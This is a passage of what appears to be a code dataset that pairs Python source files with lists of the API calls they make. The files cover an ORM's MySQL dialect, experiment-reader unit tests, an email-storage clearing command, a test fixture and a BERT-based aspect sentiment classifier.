'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (3876, 3886), False, 'import os\n')] |
# coding=utf-8
import re
import traceback
from pesto_common.config.configer import Configer
from pesto_common.log.logger_factory import LoggerFactory
from pesto_orm.core.base import db_config
from pesto_orm.core.executor import ExecutorFactory
from pesto_orm.core.model import BaseModel
from pesto_orm.core.repository import BaseRepository
from pesto_orm.dialect.base import DefaultDialect
logger = LoggerFactory.get_logger('dialect.mysql.domain')
class MySQLDialect(DefaultDialect):
def get_db_type(self):
return 'mysql'
def paginate_with(self, sql, page_number, page_size):
if page_number == 1 and page_size == 1:
if re.match(DefaultDialect.select_single_pattern, sql) is not None:
return sql
offset = page_size * (page_number - 1)
return '%s LIMIT %d OFFSET %d' % (sql, page_size, offset)
db_type = Configer.get('db.type')
if db_type == 'mysql':
import mysql.connector as connector
db_config['target'] = connector
db_config['use_pure'] = True
from mysql.connector.conversion import MySQLConverter
class NumpyMySQLConverter(MySQLConverter):
''' A mysql.connector Converter that handles Numpy types '''
def _float32_to_mysql(self, value):
return float(value)
def _float64_to_mysql(self, value):
return float(value)
def _int32_to_mysql(self, value):
return int(value)
def _int64_to_mysql(self, value):
return int(value)
db_config['converter_class'] = NumpyMySQLConverter
mysqlExecutor = ExecutorFactory.get_executor(db_config=db_config)
mysqlDialect = MySQLDialect()
class MysqlBaseModel(BaseModel):
def __init__(self, db_name=None, table_name=None, table_alias=None, primary_key='id'):
super(MysqlBaseModel, self).__init__(db_name, table_name, table_alias, primary_key)
def get_dialect(self):
return mysqlDialect
def get_executor(self):
return mysqlExecutor
class MysqlBaseRepository(BaseRepository):
def __init__(self, model_class=None):
super(MysqlBaseRepository, self).__init__(model_class)
def get_dialect(self):
return mysqlDialect
def get_executor(self):
return mysqlExecutor
def transaction(rollback_exceptions=[]):
def wrap(func):
def handle(result, **kwargs): # 真实执行原方法.
func = kwargs['func']
args = kwargs['args']
kwargs = kwargs['kwargs']
return_value = func(*args, **kwargs)
logger.info('Transaction method: ' + func.__name__)
result.append(return_value)
def to_do(*args, **kwargs):
new_kwargs = {'func': func, 'args': args, 'kwargs': kwargs}
result = []
try:
mysqlExecutor.begin_transaction()
handle(result, **new_kwargs)
mysqlExecutor.commit_transaction()
except Exception as e:
if len(rollback_exceptions) == 0 or e.__class__ in rollback_exceptions:
mysqlExecutor.rollback_transaction()
logger.error('Method execute error. method: ' + str(func.__name__) + ', error:' + traceback.format_exc() + ', transaction roll back.')
else:
mysqlExecutor.commit_transaction()
raise e
finally:
mysqlExecutor.close_transaction()
return to_do
return wrap
| [
"traceback.format_exc",
"pesto_orm.core.executor.ExecutorFactory.get_executor",
"re.match",
"pesto_common.log.logger_factory.LoggerFactory.get_logger",
"pesto_common.config.configer.Configer.get"
] | [((401, 449), 'pesto_common.log.logger_factory.LoggerFactory.get_logger', 'LoggerFactory.get_logger', (['"""dialect.mysql.domain"""'], {}), "('dialect.mysql.domain')\n", (425, 449), False, 'from pesto_common.log.logger_factory import LoggerFactory\n'), ((879, 902), 'pesto_common.config.configer.Configer.get', 'Configer.get', (['"""db.type"""'], {}), "('db.type')\n", (891, 902), False, 'from pesto_common.config.configer import Configer\n'), ((1591, 1640), 'pesto_orm.core.executor.ExecutorFactory.get_executor', 'ExecutorFactory.get_executor', ([], {'db_config': 'db_config'}), '(db_config=db_config)\n', (1619, 1640), False, 'from pesto_orm.core.executor import ExecutorFactory\n'), ((661, 712), 're.match', 're.match', (['DefaultDialect.select_single_pattern', 'sql'], {}), '(DefaultDialect.select_single_pattern, sql)\n', (669, 712), False, 'import re\n'), ((3227, 3249), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (3247, 3249), False, 'import traceback\n')] |
import os
import re
import unittest
import shutil
import subprocess
import logging
import zipfile
from io import BytesIO
from ..experiment.file_storage_driver import FileStorageDriver
from ..experiment.experiment_reader import ExperimentReader
from ..experiment.experiment_writer import ExperimentWriter
class ExperimentReaderTest(unittest.TestCase):
def setUp(self):
writer = ExperimentWriter(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
writer.write_project("test_project", "test_description")
writer.write_project("test_project_two", "test_description_2")
process = subprocess.Popen(['surround', 'init', '-p', 'test_project', '-d', 'test_description', '-w', 'no'], cwd="temporary", stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
process.stdout.close()
process.stderr.close()
process = subprocess.Popen(['surround', 'init', '-p', 'test_project_two', '-d', 'test_description', '-w', 'no'], cwd="temporary", stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
process.stdout.close()
process.stderr.close()
os.makedirs(os.path.join("temporary", "test_project", "models"))
with open("temporary/test_project/models/test.model", "w+") as f:
f.write("WEIGHTS")
os.makedirs(os.path.join("temporary", "test_project_two", "models"))
with open("temporary/test_project_two/models/test.model", "w+") as f:
f.write("WEIGHTS")
writer.start_experiment("test_project", "temporary/test_project", args={'mode': 'batch'}, notes=['test', 'note'])
logging.info("test_log")
writer.stop_experiment(metrics={'test_metric': 0.1})
writer.start_experiment("test_project", "temporary/test_project", args={'mode': 'batch'}, notes=['test', 'note'])
logging.info("test_log")
writer.stop_experiment(metrics={'test_metric': 0.2})
writer.start_experiment("test_project_two", "temporary/test_project_two", args={'mode': 'batch'}, notes=['test', 'note'])
logging.info("test_log")
writer.stop_experiment(metrics={'test_metric': 0.2})
writer.start_experiment("test_project_two", "temporary/test_project_two", args={'mode': 'batch'}, notes=['test', 'note'])
writer.stop_experiment(metrics={'test_metric': 0.3})
self.folder_names = os.listdir("temporary/experiments/experimentation/test_project/experiments")
self.folder_names_2 = os.listdir("temporary/experiments/experimentation/test_project_two/experiments")
self.folder_names = sorted(self.folder_names)
self.folder_names_2 = sorted(self.folder_names_2)
def tearDown(self):
shutil.rmtree("temporary")
def test_get_projects(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
projects = reader.get_projects()
self.assertIsInstance(projects, list)
expected_names = ["test_project", "test_project_two"]
expected_descs = ["test_description", "test_description_2"]
for proj in projects:
self.assertIn("project_name", proj)
self.assertIn("project_description", proj)
self.assertIn("last_time_updated", proj)
self.assertIn(proj['project_name'], expected_names)
self.assertIn(proj['project_description'], expected_descs)
self.assertRegex(proj['last_time_updated'], r"^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}\.[0-9]{6}$")
def test_get_project(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
project = reader.get_project("test_project")
self.assertEqual("test_project", project["project_name"])
self.assertEqual("test_description", project["project_description"])
self.assertRegex(project['last_time_updated'], r"^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}\.[0-9]{6}$")
project = reader.get_project("doesnt exist")
self.assertIsNone(project)
def test_has_project(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
self.assertTrue(reader.has_project("test_project"))
self.assertTrue(reader.has_project("test_project_two"))
self.assertFalse(reader.has_project("non-exist"))
def test_get_experiment(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
exp = reader.get_experiment("test_project", self.folder_names[0])
self.assertIn("execution_info", exp)
self.assertIn("logs", exp)
self.assertIn("results", exp)
self.assertEqual(exp["execution_info"]["start_time"], self.folder_names[0])
self.assertIn("INFO:root:test_log", exp["logs"][0])
self.assertEqual(exp["results"]["start_time"], self.folder_names[0])
def test_get_experiments(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
exps = reader.get_experiments("test_project")
for exp in exps:
self.assertIn(exp['execution_info']['start_time'], self.folder_names + self.folder_names_2)
self.assertIn("INFO:root:test_log", exp["logs"][0])
self.assertIn(exp['results']['start_time'], self.folder_names + self.folder_names_2)
def test_has_experiment(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
for name in self.folder_names:
self.assertTrue(reader.has_experiment("test_project", name))
for name in self.folder_names_2:
self.assertTrue(reader.has_experiment("test_project_two", name))
self.assertFalse(reader.has_experiment("non-exist", "non-exists"))
self.assertFalse(reader.has_experiment("test_project", "non-exists"))
self.assertFalse(reader.has_experiment("test_project_two", "non-exists"))
def test_get_experiment_files(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
expected_files = [
"code.zip",
"results.json",
"execution_info.json",
"log.txt"
]
for name in self.folder_names:
files = reader.get_experiment_files("test_project", name)
for f in expected_files:
self.assertIn(f, files)
for name in self.folder_names_2:
files = reader.get_experiment_files("test_project_two", name)
for f in expected_files:
self.assertIn(f, files)
def test_get_cache_files(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
files = reader.get_project_cache("test_project")
for f in files:
self.assertRegex(f, r"^model-[T0-9\-]{26}-[a-z0-9]+\.zip$")
def test_pull_experiment_files(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
log = reader.pull_experiment_file("test_project", self.folder_names[0], "log.txt")
self.assertIsNotNone(log)
log = log.decode('utf-8')
self.assertIn("INFO:root:test_log", log.rstrip())
log = reader.pull_experiment_file("test_project_two", self.folder_names_2[0], "log.txt")
self.assertIsNotNone(log)
log = log.decode('utf-8')
self.assertIn("INFO:root:test_log", log.rstrip())
def test_pull_cache_files(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
cache_files = reader.get_project_cache("test_project")
self.assertGreater(len(cache_files), 0)
model = reader.pull_cache_file("test_project", cache_files[0])
self.assertIsNotNone(model)
with open("temporary/model.zip", "wb+") as f:
f.write(model)
with zipfile.ZipFile("temporary/model.zip", "r") as f:
model_file = f.read("models/test.model")
model_file = model_file.decode('utf-8')
self.assertEqual("WEIGHTS", model_file)
def test_pull_model(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
cache_files = reader.get_project_cache("test_project")
self.assertGreater(len(cache_files), 0)
self.assertRegex(cache_files[0], r"^model.+-(.+)\.zip$")
expected_file = reader.pull_cache_file("test_project", cache_files[0])
model_hash = re.match(r"^model.+-(.+)\.zip$", cache_files[0]).group(1)
pulled_file = reader.pull_model("test_project", model_hash)
self.assertIsNotNone(pulled_file)
self.assertEqual(expected_file, pulled_file)
def test_replicate_file(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
output = reader.replicate("test_project", self.folder_names[0], file_path="temporary/replication")
self.assertEqual(output, "temporary/replication")
expected_files = [
'.surround',
'models/test.model',
'test_project/',
'test_project/stages/baseline.py',
'dodo.py',
]
self.assertTrue(os.path.exists("temporary/replication"))
for expected in expected_files:
self.assertTrue(os.path.exists(os.path.join("temporary/replication", expected)))
with open("temporary/replication/models/test.model", "r") as f:
self.assertEqual("WEIGHTS", f.read())
def test_replicate_zip(self):
reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
output_zip = reader.replicate("test_project", self.folder_names[0])
output_zip = BytesIO(output_zip)
self.assertIsNotNone(output_zip)
expected_files = [
'.surround/config.yaml',
'models/test.model',
'test_project/__main__.py',
'test_project/stages/baseline.py',
'dodo.py',
]
with zipfile.ZipFile(output_zip, "r") as f:
for expected in expected_files:
self.assertIn(expected, f.namelist())
| [
"os.path.exists",
"os.listdir",
"zipfile.ZipFile",
"subprocess.Popen",
"io.BytesIO",
"os.path.join",
"re.match",
"shutil.rmtree",
"logging.info"
] | [((635, 807), 'subprocess.Popen', 'subprocess.Popen', (["['surround', 'init', '-p', 'test_project', '-d', 'test_description', '-w', 'no'\n ]"], {'cwd': '"""temporary"""', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['surround', 'init', '-p', 'test_project', '-d',\n 'test_description', '-w', 'no'], cwd='temporary', stdout=subprocess.\n PIPE, stderr=subprocess.PIPE)\n", (651, 807), False, 'import subprocess\n'), ((903, 1079), 'subprocess.Popen', 'subprocess.Popen', (["['surround', 'init', '-p', 'test_project_two', '-d', 'test_description',\n '-w', 'no']"], {'cwd': '"""temporary"""', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['surround', 'init', '-p', 'test_project_two', '-d',\n 'test_description', '-w', 'no'], cwd='temporary', stdout=subprocess.\n PIPE, stderr=subprocess.PIPE)\n", (919, 1079), False, 'import subprocess\n'), ((1653, 1677), 'logging.info', 'logging.info', (['"""test_log"""'], {}), "('test_log')\n", (1665, 1677), False, 'import logging\n'), ((1870, 1894), 'logging.info', 'logging.info', (['"""test_log"""'], {}), "('test_log')\n", (1882, 1894), False, 'import logging\n'), ((2095, 2119), 'logging.info', 'logging.info', (['"""test_log"""'], {}), "('test_log')\n", (2107, 2119), False, 'import logging\n'), ((2402, 2478), 'os.listdir', 'os.listdir', (['"""temporary/experiments/experimentation/test_project/experiments"""'], {}), "('temporary/experiments/experimentation/test_project/experiments')\n", (2412, 2478), False, 'import os\n'), ((2509, 2594), 'os.listdir', 'os.listdir', (['"""temporary/experiments/experimentation/test_project_two/experiments"""'], {}), "('temporary/experiments/experimentation/test_project_two/experiments'\n )\n", (2519, 2594), False, 'import os\n'), ((2736, 2762), 'shutil.rmtree', 'shutil.rmtree', (['"""temporary"""'], {}), "('temporary')\n", (2749, 2762), False, 'import shutil\n'), ((10023, 10042), 'io.BytesIO', 'BytesIO', (['output_zip'], {}), '(output_zip)\n', (10030, 10042), False, 'from io import BytesIO\n'), ((1177, 1228), 'os.path.join', 'os.path.join', (['"""temporary"""', '"""test_project"""', '"""models"""'], {}), "('temporary', 'test_project', 'models')\n", (1189, 1228), False, 'import os\n'), ((1356, 1411), 'os.path.join', 'os.path.join', (['"""temporary"""', '"""test_project_two"""', '"""models"""'], {}), "('temporary', 'test_project_two', 'models')\n", (1368, 1411), False, 'import os\n'), ((8115, 8158), 'zipfile.ZipFile', 'zipfile.ZipFile', (['"""temporary/model.zip"""', '"""r"""'], {}), "('temporary/model.zip', 'r')\n", (8130, 8158), False, 'import zipfile\n'), ((9487, 9526), 'os.path.exists', 'os.path.exists', (['"""temporary/replication"""'], {}), "('temporary/replication')\n", (9501, 9526), False, 'import os\n'), ((10317, 10349), 'zipfile.ZipFile', 'zipfile.ZipFile', (['output_zip', '"""r"""'], {}), "(output_zip, 'r')\n", (10332, 10349), False, 'import zipfile\n'), ((8738, 8786), 're.match', 're.match', (['"""^model.+-(.+)\\\\.zip$"""', 'cache_files[0]'], {}), "('^model.+-(.+)\\\\.zip$', cache_files[0])\n", (8746, 8786), False, 'import re\n'), ((9612, 9659), 'os.path.join', 'os.path.join', (['"""temporary/replication"""', 'expected'], {}), "('temporary/replication', expected)\n", (9624, 9659), False, 'import os\n')] |
from __future__ import print_function
import os
from argparse import ArgumentParser, Namespace
from zope.interface import implementer
from quickmail.commands import ICommand
from quickmail.utils.misc import quick_mail_dir, heavy_tick, quick_mail_template_dir
@implementer(ICommand)
class ClearCommand:
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument('-j',
'--justdoit',
action='store_true',
help='clear storage including the credentials and token')
parser.description = 'Use the clear command to clear all email body that are saved in your home directories. ' \
'Additionally, pass --justdoit to remove the credential files as well'
def run_command(self, args: Namespace):
if not os.path.exists(quick_mail_dir):
print('Storage already is empty ' + heavy_tick)
return
if args.justdoit:
saved_files = [file for file in os.listdir(quick_mail_dir) if (file.endswith('.json') or file.endswith('.pickle'))]
for file in saved_files:
os.remove(quick_mail_dir + '/' + file)
else:
saved_files = [file for file in os.listdir(quick_mail_dir) if file.endswith('.txt')]
for file in saved_files:
os.remove(quick_mail_dir + '/' + file)
saved_files = [file for file in os.listdir(quick_mail_template_dir) if file.endswith('.txt')]
for file in saved_files:
os.remove(quick_mail_template_dir + file)
print('Storage cleared ' + heavy_tick + heavy_tick)
def get_desc(self) -> str:
return 'clear the body of message from local or even the token if --justdoit argument is added'
| [
"os.path.exists",
"zope.interface.implementer",
"os.listdir",
"os.remove"
] | [((263, 284), 'zope.interface.implementer', 'implementer', (['ICommand'], {}), '(ICommand)\n', (274, 284), False, 'from zope.interface import implementer\n'), ((858, 888), 'os.path.exists', 'os.path.exists', (['quick_mail_dir'], {}), '(quick_mail_dir)\n', (872, 888), False, 'import os\n'), ((1567, 1608), 'os.remove', 'os.remove', (['(quick_mail_template_dir + file)'], {}), '(quick_mail_template_dir + file)\n', (1576, 1608), False, 'import os\n'), ((1177, 1215), 'os.remove', 'os.remove', (["(quick_mail_dir + '/' + file)"], {}), "(quick_mail_dir + '/' + file)\n", (1186, 1215), False, 'import os\n'), ((1380, 1418), 'os.remove', 'os.remove', (["(quick_mail_dir + '/' + file)"], {}), "(quick_mail_dir + '/' + file)\n", (1389, 1418), False, 'import os\n'), ((1460, 1495), 'os.listdir', 'os.listdir', (['quick_mail_template_dir'], {}), '(quick_mail_template_dir)\n', (1470, 1495), False, 'import os\n'), ((1040, 1066), 'os.listdir', 'os.listdir', (['quick_mail_dir'], {}), '(quick_mail_dir)\n', (1050, 1066), False, 'import os\n'), ((1274, 1300), 'os.listdir', 'os.listdir', (['quick_mail_dir'], {}), '(quick_mail_dir)\n', (1284, 1300), False, 'import os\n')] |
import os
import pytest
from bank_bot.banking_system import Database
class MockMessage(object):
def __init__(self, from_who, chat_id, message_text):
self.json = {"from": {"id": from_who}, "chat": {"id": chat_id}}
self.text = message_text
@pytest.fixture
def database():
test_file_path = "test_database.db"
database = Database(test_file_path)
database.initialize_system()
yield database
os.remove(test_file_path)
@pytest.fixture
def mock_message():
message = MockMessage(2, 2, "Mock")
return message
| [
"bank_bot.banking_system.Database",
"os.remove"
] | [((347, 371), 'bank_bot.banking_system.Database', 'Database', (['test_file_path'], {}), '(test_file_path)\n', (355, 371), False, 'from bank_bot.banking_system import Database\n'), ((428, 453), 'os.remove', 'os.remove', (['test_file_path'], {}), '(test_file_path)\n', (437, 453), False, 'import os\n')] |
from typing import *
from dataclasses import asdict
from transformers import BertModel
from torch.nn.utils.rnn import pad_sequence
from stud.models.ner_classifier import NERClassifier
from stud.models.polarity_classifier import PolarityClassifier
from stud.constants import LOGGER_TRAIN_LOSS, LOGGER_VALID_LOSS, LOGGER_TEST_LOSS
from stud.torch_utils import batch_scatter_mean
from torchtext.vocab import Vocab
from stud import utils
import pytorch_lightning as pl
import torch
import torch.nn as nn
def model_from(hparams: utils.HParams, polarity_hparams: Optional[utils.HParams] = None) -> nn.Module:
''' Returns the correct model from the input hparams. '''
if polarity_hparams:
ner_model = NERClassifier.load_from_checkpoint(hparams.ner_model_path, hparams=hparams)
polarity_model = PolarityClassifier.load_from_checkpoint(polarity_hparams.polarity_model_path, hparams=polarity_hparams)
return AspectMultistepClassifier(ner_model, polarity_model)
if hparams.model_name == 'bert_lstm':
bert = BertModel.from_pretrained(utils.get_bert_path(hparams))
# Using BERT as a frozen encoder
bert.eval()
return BERTLSTMClassification(hparams, bert)
if hparams.model_name == 'multistep_classifier':
raise Exception(f'Missing implementation of AspectMultistepClassifier!')
raise Exception(f'{hparams.model_name} not supported!')
class BERTLSTMClassification(nn.Module):
def __init__(
self,
hparams: utils.HParams,
bert: BertModel
):
super().__init__()
self.hparams = hparams
self.bert = bert
self.lstm = nn.LSTM(self.bert_output_dim, hparams.hidden_dim,
batch_first=True, bidirectional=True)
self.fc1 = nn.Linear(2 * hparams.hidden_dim, hparams.hidden_dim)
self.fc2 = nn.Linear(hparams.hidden_dim, len(hparams.output_vocab))
self.dropout = nn.Dropout(hparams.dropout)
@property
def bert_output_dim(self) -> int:
''' Returns BERT output dimension from the chosen pooling strategy. '''
return (
self.hparams.input_dim * len(self.hparams.layers_to_merge)
if self.hparams.strategy == 'cat'
else self.hparams.input_dim
)
def forward(self, x: Dict[str, torch.Tensor]) -> torch.Tensor:
with torch.no_grad():
batch_out = self.bert(**x['batch'], output_hidden_states=True)
batch_out = utils.merge_layers(
batch_out.hidden_states, strategy=self.hparams.strategy,
layers_to_merge=self.hparams.layers_to_merge
)
# Merge WordPiece embeddings into token embeddings
batch_out = batch_scatter_mean(batch_out, x['mask'])
batch_out, _ = self.lstm(self.dropout(batch_out))
batch_out = torch.relu(self.dropout(self.fc1(batch_out)))
batch_out = self.fc2(batch_out)
return batch_out
class ABSAClassifier(pl.LightningModule):
'''
NER classifier identifies aspect terms and polarities for task A+B.
:param hparams: hyperparameters and target vocab to set up the model
'''
def __init__(self, hparams: utils.HParams):
super().__init__()
self.save_hyperparameters(asdict(hparams))
self.output_dim = len(hparams.output_vocab)
self.model = model_from(hparams)
self.evaluate_callback = None
self.ignore_index = hparams.output_vocab.get_default_index()
self.loss_fn = nn.CrossEntropyLoss(ignore_index=self.ignore_index)
self.aspect_predictions = []
self.aspect_indexes = []
self.gold = []
@property
def bio_itos(self) -> Tuple[List[int], List[int], int]:
''' Returns the extended BIOs indexes. '''
return (
utils.vocab_tokens_startswith(self.hparams.output_vocab, 'B'),
utils.vocab_tokens_startswith(self.hparams.output_vocab, 'I'),
self.hparams.output_vocab['O'])
def training_step(
self,
batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]],
batch_idx: int
) -> torch.Tensor:
x, y = batch
y_hat = self.model(x)
loss = self.loss_fn(y_hat.view(-1, self.output_dim), y['ner'].view(-1).long())
metrics = {LOGGER_TRAIN_LOSS: loss}
self.log_dict(metrics, on_step=False, on_epoch=True)
return loss
@torch.no_grad()
def evaluation(
self,
batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]
) -> Tuple[torch.Tensor, torch.Tensor]:
x, y = batch
y_hat = self.model(x)
loss = 0
if not self.hparams.test_only:
loss = self.loss_fn(y_hat.view(-1, self.output_dim), y['ner'].view(-1).long())
return loss, y_hat
def validation_step(
self,
batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]],
batch_idx: int
):
loss, logits = self.evaluation(batch)
metrics = {LOGGER_VALID_LOSS: loss}
self.log_dict(metrics, on_step=False, on_epoch=True)
def test_step(
self,
batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]],
batch_idx: int = 0
) -> Tuple[List[List[str]], List[List[str]]]:
x, y = batch
loss, logits = self.evaluation(batch)
y_hat = logits.argmax(-1)
aspect_indexes, polarity_terms = zip(*[utils.extract_aspect_indices(
prediction_idxs, length, *self.bio_itos, return_tensors=True
) for prediction_idxs, length in zip(y_hat.detach().cpu(), x['lengths'])])
aspect_terms = self.batch_aspects_lookup(x['tokens'], aspect_indexes)
polarity_terms = self.batch_aggregate_polarities(polarity_terms)
self.aspect_indexes += aspect_indexes
self.aspect_predictions += polarity_terms
if not self.hparams.test_only:
self.gold += [list(zip(*labels)) for labels in zip(y['aspect'], y['polarity_labels'])]
assert len(self.aspect_indexes) == len(self.gold)
metrics = {LOGGER_TEST_LOSS: loss}
self.log_dict(metrics)
return aspect_terms, polarity_terms
def batch_aggregate_polarities(
self,
batch_idxs: List[int]
) -> List[List[str]]:
return [[utils.aggregate_polarities(idxs, self.hparams.output_vocab) for idxs in sent_idxs] for sent_idxs in batch_idxs]
def aspects_lookup(
self,
tokens: List[str],
idxs: List[List[int]],
sep: str = ' '
) -> List[List[str]]:
''' Returns the collection of tokens indexed by idxs. '''
return [sep.join([tokens[k].text for k in idx]) for idx in idxs]
def batch_aspects_lookup(
self,
batch_tokens: List[List[str]],
indexes: List[List[List[int]]]
) -> List[List[List[str]]]:
''' Batch-version of aspects_lookup. '''
return [self.aspects_lookup(tokens, idxs) for idxs, tokens in zip(indexes, batch_tokens)]
def test_epoch_end(self, outputs: Tuple[List[List[str]], List[List[str]]]) -> None:
aspect_terms, polarity_terms = zip(*[sample for batch in outputs for sample in zip(*batch)])
self.predictions = [{'targets': list(zip(*pred))} for pred in zip(aspect_terms, polarity_terms)]
if not self.hparams.test_only and self.evaluate_callback:
self.gold = [{'targets': [(1, *t) for t in terms]} for terms in self.gold]
scores, precision, recall, f1 = self.evaluate_callback(self.gold, self.predictions)
self.log_dict({'precision': precision, 'recall': recall, 'f1': f1})
def configure_optimizers(self):
return torch.optim.Adam(self.model.parameters())
class AspectMultistepClassifier(pl.LightningModule):
'''
Experiment with a multistep classifier that predicts labels for A+B using
individually trained models for task A and task B.
'''
def __init__(
self,
ner_model: pl.LightningModule,
polarity_model: pl.LightningModule
):
super().__init__()
self.ner_model = ner_model
self.polarity_model = polarity_model
self.predictions = []
self.gold = []
self.aspect_pred = []
self.polarity_pred = []
@torch.no_grad()
def evaluation(
self,
batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]
):
x, y = batch
y_hat = self.ner_model.model(x).argmax(-1)
# Extract aspect indexes from the first model
x['aspect_indexes'], _ = zip(*[utils.extract_aspect_indices(
prediction_idxs, length, *self.ner_model.bio_idxs, return_tensors=True
) for prediction_idxs, length in zip(y_hat, x['lengths'])])
self.aspect_pred += [[' '.join([sent_tokens[idx].text for idx in idxs])
for idxs in sent_idx]
for sent_idx, sent_tokens in zip(x['aspect_indexes'], x['tokens'])]
y_hat = self.polarity_model.model(x).argmax(-1)
aspects_indexes = pad_sequence(
[torch.ones(len(idxs)) for idxs in x['aspect_indexes']],
batch_first=True, padding_value=self.polarity_model.ignore_index)
# Apply masking to aspect_indexes, ignoring padded elements
aspects_mask = aspects_indexes != self.polarity_model.ignore_index
# Extract predictions from the second model
self.polarity_pred += [pred[mask].tolist() for pred, mask in zip(y_hat, aspects_mask)]
# Pair predictions of model A with predictions of model B (i.e. list of (term_i, polarity_i))
self.predictions += [list(zip(aspects, predictions))
for aspects, predictions in zip(self.aspect_pred, self.polarity_pred)]
# Store gold labels to perform evaluation
gold_mask = y['polarity'] != self.polarity_model.ignore_index
self.gold += [list(zip(aspects, polarities[mask].int().tolist()))
for aspects, polarities, mask in zip(y['aspect'], y['polarity'], gold_mask)]
def test_step(
self,
batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]],
batch_idx: int
):
x, y = batch
logits = self.evaluation(batch)
| [
"stud.models.ner_classifier.NERClassifier.load_from_checkpoint",
"stud.utils.aggregate_polarities",
"torch.nn.Dropout",
"stud.utils.merge_layers",
"torch.nn.CrossEntropyLoss",
"dataclasses.asdict",
"stud.utils.vocab_tokens_startswith",
"torch.nn.LSTM",
"stud.torch_utils.batch_scatter_mean",
"stud.... | [((4402, 4417), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4415, 4417), False, 'import torch\n'), ((8295, 8310), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (8308, 8310), False, 'import torch\n'), ((711, 786), 'stud.models.ner_classifier.NERClassifier.load_from_checkpoint', 'NERClassifier.load_from_checkpoint', (['hparams.ner_model_path'], {'hparams': 'hparams'}), '(hparams.ner_model_path, hparams=hparams)\n', (745, 786), False, 'from stud.models.ner_classifier import NERClassifier\n'), ((812, 920), 'stud.models.polarity_classifier.PolarityClassifier.load_from_checkpoint', 'PolarityClassifier.load_from_checkpoint', (['polarity_hparams.polarity_model_path'], {'hparams': 'polarity_hparams'}), '(polarity_hparams.\n polarity_model_path, hparams=polarity_hparams)\n', (851, 920), False, 'from stud.models.polarity_classifier import PolarityClassifier\n'), ((1649, 1740), 'torch.nn.LSTM', 'nn.LSTM', (['self.bert_output_dim', 'hparams.hidden_dim'], {'batch_first': '(True)', 'bidirectional': '(True)'}), '(self.bert_output_dim, hparams.hidden_dim, batch_first=True,\n bidirectional=True)\n', (1656, 1740), True, 'import torch.nn as nn\n'), ((1784, 1837), 'torch.nn.Linear', 'nn.Linear', (['(2 * hparams.hidden_dim)', 'hparams.hidden_dim'], {}), '(2 * hparams.hidden_dim, hparams.hidden_dim)\n', (1793, 1837), True, 'import torch.nn as nn\n'), ((1937, 1964), 'torch.nn.Dropout', 'nn.Dropout', (['hparams.dropout'], {}), '(hparams.dropout)\n', (1947, 1964), True, 'import torch.nn as nn\n'), ((2475, 2600), 'stud.utils.merge_layers', 'utils.merge_layers', (['batch_out.hidden_states'], {'strategy': 'self.hparams.strategy', 'layers_to_merge': 'self.hparams.layers_to_merge'}), '(batch_out.hidden_states, strategy=self.hparams.strategy,\n layers_to_merge=self.hparams.layers_to_merge)\n', (2493, 2600), False, 'from stud import utils\n'), ((2710, 2750), 'stud.torch_utils.batch_scatter_mean', 'batch_scatter_mean', (['batch_out', "x['mask']"], {}), "(batch_out, x['mask'])\n", (2728, 2750), False, 'from stud.torch_utils import batch_scatter_mean\n'), ((3495, 3546), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {'ignore_index': 'self.ignore_index'}), '(ignore_index=self.ignore_index)\n', (3514, 3546), True, 'import torch.nn as nn\n'), ((1067, 1095), 'stud.utils.get_bert_path', 'utils.get_bert_path', (['hparams'], {}), '(hparams)\n', (1086, 1095), False, 'from stud import utils\n'), ((2363, 2378), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2376, 2378), False, 'import torch\n'), ((3255, 3270), 'dataclasses.asdict', 'asdict', (['hparams'], {}), '(hparams)\n', (3261, 3270), False, 'from dataclasses import asdict\n'), ((3795, 3856), 'stud.utils.vocab_tokens_startswith', 'utils.vocab_tokens_startswith', (['self.hparams.output_vocab', '"""B"""'], {}), "(self.hparams.output_vocab, 'B')\n", (3824, 3856), False, 'from stud import utils\n'), ((3870, 3931), 'stud.utils.vocab_tokens_startswith', 'utils.vocab_tokens_startswith', (['self.hparams.output_vocab', '"""I"""'], {}), "(self.hparams.output_vocab, 'I')\n", (3899, 3931), False, 'from stud import utils\n'), ((6318, 6377), 'stud.utils.aggregate_polarities', 'utils.aggregate_polarities', (['idxs', 'self.hparams.output_vocab'], {}), '(idxs, self.hparams.output_vocab)\n', (6344, 6377), False, 'from stud import 